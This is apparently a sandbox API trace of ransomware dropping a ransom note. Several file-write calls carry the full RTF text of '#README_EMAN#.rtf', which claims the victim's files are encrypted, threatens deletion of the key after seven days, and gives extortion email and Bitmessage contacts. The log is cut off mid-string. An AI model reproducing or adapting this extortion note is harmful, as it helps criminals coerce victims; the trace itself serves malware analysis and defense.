CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.658] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.659] CloseHandle (hObject=0x2c8) returned 1 [0281.659] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0281.659] GetLastError () returned 0x2 [0281.659] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.660] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.660] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 